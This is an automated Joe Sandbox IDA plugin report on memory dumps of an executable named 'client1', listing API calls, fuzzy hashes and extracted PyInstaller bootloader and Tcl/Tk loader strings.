                                                    • Instruction Fuzzy Hash: 7CF04F54B1978A41FEB57A7255403F5A69E5F84B80F985630C92D86282DD9CF5508330
                                                    APIs
                                                    • HeapAlloc.KERNEL32(?,?,?,00007FF79F62FE44,?,?,?,00007FF79F631356,?,?,?,?,?,00007FF79F632949), ref: 00007FF79F63CB0A
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: AllocHeap
                                                    • String ID:
                                                    • API String ID: 4292702814-0
                                                    • Opcode ID: c69b2b415516246c39874758743c65376e97b2ba2b88f646b423658d781f7dfd
                                                    • Instruction ID: aa05f9ea2760911250fe5ba90daae30ba66b8c2fb617f334bac014371a84969b
                                                    • Opcode Fuzzy Hash: c69b2b415516246c39874758743c65376e97b2ba2b88f646b423658d781f7dfd
                                                    • Instruction Fuzzy Hash: 18F05E01B0D3C245FE347AB159402F591EA5F457A0F880630E93E862C2EEACB4408231
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window$Create$Move$ObjectSelect$#380BaseClientDialogDrawFontIndirectInfoParametersRectReleaseSystemTextUnits
                                                    • String ID: BUTTON$Close$EDIT$Failed to execute script '%ls' due to unhandled exception: %ls$STATIC
                                                    • API String ID: 2446303242-1601438679
                                                    • Opcode ID: 47b3578659853d453a5822a751c8e2f63cfdf798862dd1eeebf7592aa26dc86d
                                                    • Instruction ID: b9134069d09b4a981dbd7b4c413f77d9912caae64fa4358441e8a9d992f4923f
                                                    • Opcode Fuzzy Hash: 47b3578659853d453a5822a751c8e2f63cfdf798862dd1eeebf7592aa26dc86d
                                                    • Instruction Fuzzy Hash: 05A17C32208BC196E724AF21E98479EB375F748BA4F904129DB9D43B14DF3DE165CB50
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    • Associated: 00000002.00000002.2693275344.00007FFBAA730000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA735000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA792000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7DE000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E1000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E6000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA840000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693474597.00007FFBAA843000.00000004.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693491810.00007FFBAA845000.00000002.00000001.01000000.00000015.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa730000_client1.jbxd
                                                    Similarity
                                                    • API ID: Mem_$SubtypeType_$DataFreeFromKindMallocReallocUnicode_
                                                    • String ID:
                                                    • API String ID: 1742244024-0
                                                    • Opcode ID: 2d17a493920b6b36c6fa0658f81e569c9b995c639d436fc25a26417b6e17d25f
                                                    • Instruction ID: c04d64c3fef85792c4400a0fdf12867e3e17d2fe46a8b686db6be3bf82c6c907
                                                    • Opcode Fuzzy Hash: 2d17a493920b6b36c6fa0658f81e569c9b995c639d436fc25a26417b6e17d25f
                                                    • Instruction Fuzzy Hash: EB0202F2B0E592C2EB769F39D44467B37A9EB44744F1641B5EE8E46690EE2CE442C330
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    • Associated: 00000002.00000002.2693275344.00007FFBAA730000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA735000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA792000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7DE000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E1000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E6000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA840000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693474597.00007FFBAA843000.00000004.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693491810.00007FFBAA845000.00000002.00000001.01000000.00000015.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa730000_client1.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                    • String ID:
                                                    • API String ID: 313767242-0
                                                    • Opcode ID: d5821aaf4936ad9aa18e348792a4e6496cc638c229f42c96d8f2983ca85ed40f
                                                    • Instruction ID: 63a731e721399a7c8df38d15341aaedb02992d6044c6cb3a0ae5b139c9d1dce0
                                                    • Opcode Fuzzy Hash: d5821aaf4936ad9aa18e348792a4e6496cc638c229f42c96d8f2983ca85ed40f
                                                    • Instruction Fuzzy Hash: 41317CB270AA81C9EB61AF70E8903EE7369FB84344F45403ADA4E47A84DF39C149C720
                                                    APIs
                                                    • GetTempPathW.KERNEL32(?,00000000,?,00007FF79F62674D), ref: 00007FF79F62681A
                                                      • Part of subcall function 00007FF79F626990: GetEnvironmentVariableW.KERNEL32(00007FF79F6236E7), ref: 00007FF79F6269CA
                                                      • Part of subcall function 00007FF79F626990: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF79F6269E7
                                                      • Part of subcall function 00007FF79F6366B4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79F6366CD
                                                    • SetEnvironmentVariableW.KERNEL32(?,TokenIntegrityLevel), ref: 00007FF79F6268D1
                                                      • Part of subcall function 00007FF79F622770: MessageBoxW.USER32 ref: 00007FF79F622841
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
                                                    • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                                                    • API String ID: 3752271684-1116378104
                                                    • Opcode ID: b4ad522e37175ac7074a900ecec4c645a4870e05ba81b0992846085732047fb7
                                                    • Instruction ID: b73e192bfc0180aee66994aca1c09f11a953c254c91d60ba9fbfde6821ca2ccd
                                                    • Opcode Fuzzy Hash: b4ad522e37175ac7074a900ecec4c645a4870e05ba81b0992846085732047fb7
                                                    • Instruction Fuzzy Hash: A1517811F197C340FA74BB7299552FAD25B9F4ABC4FC44031E82E87796EE6EE4018721
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                    • String ID:
                                                    • API String ID: 3140674995-0
                                                    • Opcode ID: 24fff5600ca101af0e2334446d678d156eb325a0e0e0c0538aba544f51e330ab
                                                    • Instruction ID: d3ee896b1ff875c06ffffb4a6673900127d9fc7f2f0ab2d6f5dccacd6d17444e
                                                    • Opcode Fuzzy Hash: 24fff5600ca101af0e2334446d678d156eb325a0e0e0c0538aba544f51e330ab
                                                    • Instruction Fuzzy Hash: EF312D72609BC196EB70AF70E8803E9B369FB84754F844439DA5D47B95DF38D548C720
                                                    APIs
                                                    • _get_daylight.LIBCMT ref: 00007FF79F644E65
                                                      • Part of subcall function 00007FF79F6447B8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79F6447CC
                                                      • Part of subcall function 00007FF79F639E18: HeapFree.KERNEL32(?,?,?,00007FF79F641E42,?,?,?,00007FF79F641E7F,?,?,00000000,00007FF79F642345,?,?,?,00007FF79F642277), ref: 00007FF79F639E2E
                                                      • Part of subcall function 00007FF79F639E18: GetLastError.KERNEL32(?,?,?,00007FF79F641E42,?,?,?,00007FF79F641E7F,?,?,00000000,00007FF79F642345,?,?,?,00007FF79F642277), ref: 00007FF79F639E38
                                                      • Part of subcall function 00007FF79F639DD0: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF79F639DAF,?,?,?,?,?,00007FF79F6321EC), ref: 00007FF79F639DD9
                                                      • Part of subcall function 00007FF79F639DD0: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF79F639DAF,?,?,?,?,?,00007FF79F6321EC), ref: 00007FF79F639DFE
                                                    • _get_daylight.LIBCMT ref: 00007FF79F644E54
                                                      • Part of subcall function 00007FF79F644818: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79F64482C
                                                    • _get_daylight.LIBCMT ref: 00007FF79F6450CA
                                                    • _get_daylight.LIBCMT ref: 00007FF79F6450DB
                                                    • _get_daylight.LIBCMT ref: 00007FF79F6450EC
                                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF79F64532C), ref: 00007FF79F645113
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                    • String ID:
                                                    • API String ID: 4070488512-0
                                                    • Opcode ID: a9f1dad40c5644c1829df854b35cf2cff202b4769108a1d535aac39d904cb9be
                                                    • Instruction ID: fcc2753484b5f486a54e18bddd1f7662d5bede607d47f748dcb017644e45245b
                                                    • Opcode Fuzzy Hash: a9f1dad40c5644c1829df854b35cf2cff202b4769108a1d535aac39d904cb9be
                                                    • Instruction Fuzzy Hash: FAD1AE26A0878286E730BF35D9411F9A2AAFF85B94FD04136EE2D476C5DF3CE8418760
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                    • String ID:
                                                    • API String ID: 1239891234-0
                                                    • Opcode ID: 4204087c2144b4154cc610f07160e172692864cccd6c23e577d201b1c5d7dbdf
                                                    • Instruction ID: d38e4c0a79f0dbfa6df830ab3b98509657511f2034abe3d7e4a29a7db12c421b
                                                    • Opcode Fuzzy Hash: 4204087c2144b4154cc610f07160e172692864cccd6c23e577d201b1c5d7dbdf
                                                    • Instruction Fuzzy Hash: 8E315E32618B8196EB70AF35E8802EEB3A9FB85764F940135EA9D43B95DF3CD145CB10
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: FileFindFirst_invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 2227656907-0
                                                    • Opcode ID: 0bdd7a8416f1e28eb8c09c6b5c037a8b7871395a979be626bc7410ef92a9cb5d
                                                    • Instruction ID: 572fa503d9efa88cd8877b8e3ca50bbdc41208b686956940698c84aeaa251ad0
                                                    • Opcode Fuzzy Hash: 0bdd7a8416f1e28eb8c09c6b5c037a8b7871395a979be626bc7410ef92a9cb5d
                                                    • Instruction Fuzzy Hash: B2B18222B187E691EA70FB31D4006F9A36AEF45BE4F945131EA6E07B85DE7CE441C720
                                                    APIs
                                                    • _get_daylight.LIBCMT ref: 00007FF79F6450CA
                                                      • Part of subcall function 00007FF79F644818: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79F64482C
                                                    • _get_daylight.LIBCMT ref: 00007FF79F6450DB
                                                      • Part of subcall function 00007FF79F6447B8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79F6447CC
                                                    • _get_daylight.LIBCMT ref: 00007FF79F6450EC
                                                      • Part of subcall function 00007FF79F6447E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79F6447FC
                                                      • Part of subcall function 00007FF79F639E18: HeapFree.KERNEL32(?,?,?,00007FF79F641E42,?,?,?,00007FF79F641E7F,?,?,00000000,00007FF79F642345,?,?,?,00007FF79F642277), ref: 00007FF79F639E2E
                                                      • Part of subcall function 00007FF79F639E18: GetLastError.KERNEL32(?,?,?,00007FF79F641E42,?,?,?,00007FF79F641E7F,?,?,00000000,00007FF79F642345,?,?,?,00007FF79F642277), ref: 00007FF79F639E38
                                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF79F64532C), ref: 00007FF79F645113
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                    • String ID:
                                                    • API String ID: 3458911817-0
                                                    • Opcode ID: 8dda7e1bb43cce3069c61b2343a9d469707a009ccb87a98b23344d3931a91aef
                                                    • Instruction ID: a796102b552945bb7b714767cf37b22a4ce92422f55e44ceb41ad888243889cb
                                                    • Opcode Fuzzy Hash: 8dda7e1bb43cce3069c61b2343a9d469707a009ccb87a98b23344d3931a91aef
                                                    • Instruction Fuzzy Hash: A5515E32A187C286E730FF35E9815E9E76ABB49784FC44136EA6D43695DF3CE4018B60
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: AddressProc
                                                    • String ID: Failed to get address for PyDict_GetItemString$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyList_New$Failed to get address for PyLong_AsLong$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PySys_AddWarnOption$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetArgvEx$Failed to get address for PySys_SetObject$Failed to get address for PySys_SetPath$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_BuildValue$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_DontWriteBytecodeFlag$Failed to get address for Py_FileSystemDefaultEncoding$Failed to get address for Py_Finalize$Failed to get address for Py_FrozenFlag$Failed to get address for Py_GetPath$Failed to get address for Py_IgnoreEnvironmentFlag$Failed to get address for Py_IncRef$Failed to get address for Py_Initialize$Failed to get address for Py_NoSiteFlag$Failed to get address for Py_NoUserSiteDirectory$Failed to get address for Py_OptimizeFlag$Failed to get address for Py_SetPath$Failed to get address for Py_SetProgramName$Failed to get address for Py_SetPythonHome$Failed to get address for Py_UTF8Mode$Failed to get address for Py_UnbufferedStdioFlag$Failed to get address for Py_VerboseFlag$GetProcAddress$PyDict_GetItemString$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyList_New$PyLong_AsLong$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyRun_SimpleStringFlags$PySys_AddWarnOption$PySys_GetObject$PySys_SetArgvEx$PySys_SetObject$PySys_SetPath$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_BuildValue$Py_DecRef$Py_DecodeLocale$Py_DontWriteBytecodeFlag$Py_FileSystemDefaultEncoding$Py_Finalize$Py_FrozenFlag$Py_GetPath$Py_IgnoreEnvironmentFlag$Py_IncRef$Py_Initialize$Py_NoSiteFlag$Py_NoUserSiteDirectory$Py_OptimizeFlag$Py_SetPath$Py_SetProgramName$Py_SetPythonHome$Py_UTF8Mode$Py_UnbufferedStdioFlag$Py_VerboseFlag
                                                    • API String ID: 190572456-3109299426
                                                    • Opcode ID: 67747be8a076f706c1c9372e7d2496993eaa02b7082083ef588a9e8b618be952
                                                    • Instruction ID: 1569068ba6056d29c4952f7f3de6d42d44f31310c0c16f252f5e785b39ce0af7
                                                    • Opcode Fuzzy Hash: 67747be8a076f706c1c9372e7d2496993eaa02b7082083ef588a9e8b618be952
                                                    • Instruction Fuzzy Hash: 1E42D864A0DB8391FA75FB34EC801F4A2AFAF44794BD45135C86D462A4EF7CB558C322
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$LibraryLoad
                                                    • String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$LOADER: Failed to load tcl/tk libraries$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                    • API String ID: 2238633743-1453502826
                                                    • Opcode ID: ba523ba2b13c4ea14ee618d69630f35f7ff64aa3d65f3ca8e14aa07d75cb9247
                                                    • Instruction ID: b30a9a20e4738194fb40c84eba7b36943a02debceca7de32295cc50003b78bbb
                                                    • Opcode Fuzzy Hash: ba523ba2b13c4ea14ee618d69630f35f7ff64aa3d65f3ca8e14aa07d75cb9247
                                                    • Instruction Fuzzy Hash: AAE1D760A09B8390FA75FB35A9941F4E3BFAF047A4BD45135C82E46764EF7CA5488332
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Object_$Item$Dict_String$Attr$PackTuple_$Err_$Vectorcall$Type_Unicode_Withstrcmp$CallCompare$AllocArgsCalculateClearErrorFastFromFunctionGenericMergeMetaclassObjectOccurredReadyTrue
                                                    • String ID: <module>
